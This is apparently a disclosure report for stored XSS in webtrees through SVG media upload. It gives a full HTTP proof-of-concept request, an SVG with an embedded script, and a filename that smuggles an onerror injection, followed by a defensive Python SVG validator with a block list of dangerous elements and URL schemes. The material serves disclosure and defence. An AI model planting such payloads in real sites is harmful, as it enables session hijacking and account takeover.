Cross-site Scripting (XSS) - Stored in fisharebest/webtrees
Valid
Reported on Oct 8th 2021
Description
Stored XSS via upload of a .svg media file: an SVG containing a <script> element is stored by webtrees and served back to users unchanged, so opening the media file executes attacker-supplied JavaScript in the browser.
Proof of Concept
// PoC.req (the Cookie and _csrf values are bound to the reporter's session and must be replaced with your own; blank lines between part headers and part bodies restored)
POST /demo-dev/tree/demo/add-media-file/X9222 HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=63trarcpiic93psog3t8okts4h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Content-Type: multipart/form-data; boundary=---------------------------405026258827833307651807573856
Content-Length: 1752
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="_csrf"

NktwFM88jQhclDtOWaJYcd0o77F8n5BI
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file_location"

upload
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file"; filename="xss'><img src=x onerror=alert(1)>.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="auto"

0
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="folder"

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="new_file"

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="unused"

0_Artémis_(Diane)_-_Galleria_dei_Candelabri_-_Vatican.JPG
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="remote"

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="title"

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="type"

-----------------------------405026258827833307651807573856--
Steps to Reproduce
Create a .svg file containing the payload, for example:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
Go to the details page of a person, for example: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
From the Edit button, choose 'Add a media file'.
Upload the .svg file and save it.
The XSS triggers when a user clicks the media file: the browser navigates to the stored SVG, which is served from the webtrees origin, and executes the embedded script.
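The fix a practitioner wants for the procedure above is a server-side gate on the uploaded bytes, applied before the file reaches the media folder, plus response headers that stop a stored SVG from running as a same-origin document even if a bad file slips through. The following is an added example in Python, not webtrees' own code: it parses the upload as XML and rejects not only the <script> element from this report but also on* event handlers, javascript:/vbscript:/data: hrefs (including xlink:href and whitespace-obfuscated schemes), <use> references to external documents, and DTD entity declarations, which goes beyond the single case the report shows. The function names, the header set and the sample inputs are constructed for this example; in production prefer the defusedxml parser over the standard library one.

```python
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed a foreign document inside the image.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# href schemes that run script or smuggle a second document (data: is blocked
# too: <a href="data:text/html,..."> opens an attacker-controlled page; relax
# it for <image> if inline raster data is genuinely needed).
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")


def _local(qname: str) -> str:
    """Drop the {namespace} prefix ElementTree puts on qualified names."""
    return qname.rsplit("}", 1)[-1]


def _normalise_url(value: str) -> str:
    """Remove the whitespace and control characters browsers ignore when
    parsing a URL scheme, so 'java\\nscript:' is seen as 'javascript:'."""
    return re.sub(r"[\s\x00-\x1f]", "", value).lower()


def check_svg(data: bytes) -> list[str]:
    """Return the reasons an uploaded SVG must be rejected; [] means accept.

    Hypothetical upload gate for this example: call it on the raw bytes of
    the multipart 'file' part before anything is written to the media folder.
    """
    # Entities are an XXE / entity-expansion vector with no use in an image;
    # refuse them before handing the bytes to any parser.
    if re.search(rb"<!ENTITY", data, re.IGNORECASE):
        return ["internal DTD subset declares entities"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    reasons = []
    if _local(root.tag) != "svg":
        reasons.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        name = _local(el.tag)
        if name.lower() in FORBIDDEN_ELEMENTS:
            reasons.append(f"forbidden element <{name}>")
        href = ""
        for attr, value in el.attrib.items():
            aname = _local(attr)  # covers both href and xlink:href
            if aname.lower().startswith("on"):
                reasons.append(f"event handler attribute {aname} on <{name}>")
            if aname == "href":
                href = value
                if _normalise_url(value).startswith(DANGEROUS_SCHEMES):
                    reasons.append(f"dangerous href on <{name}>: {value!r}")
        # <use> may only reference an id inside this same document.
        if name.lower() == "use" and href and not href.startswith("#"):
            reasons.append(f"<use> referencing an external document: {href!r}")
    return reasons


def download_headers(filename: str) -> dict[str, str]:
    """Response headers for serving a stored SVG (assumed names for this
    example). 'attachment' turns the direct click from the report into a
    download instead of a same-origin page; the CSP sandbox disables script
    if the file is rendered anyway; nosniff stops content-type confusion.
    The filename is reduced to a safe character set so a name like the one
    in the PoC cannot break out of the quoted header value."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "sandbox; script-src 'none'",
    }


# The payload from the report above, embedded here as the sample input.
REPORT_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>"""

if __name__ == "__main__":
    print(check_svg(REPORT_PAYLOAD))  # ['forbidden element <script>']
    print(download_headers("xss'><img src=x onerror=alert(1)>.svg"))
```

A non-empty list from check_svg should abort the add-media-file request. Note that an SVG referenced through <img src> never runs script regardless of these headers (browsers render it in image mode); the trigger in this report is the direct click on the media file, i.e. a top-level navigation to the stored file, and that is exactly what the attachment disposition and CSP sandbox neutralise.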
Impact
Script stored this way runs in the browser of any user who opens the media file, so it can be used to steal that user's cookie, or otherwise act as that user, and gain unauthorized access to the account.
We have contacted a member of the fisharebest/webtrees team and are waiting to hear back.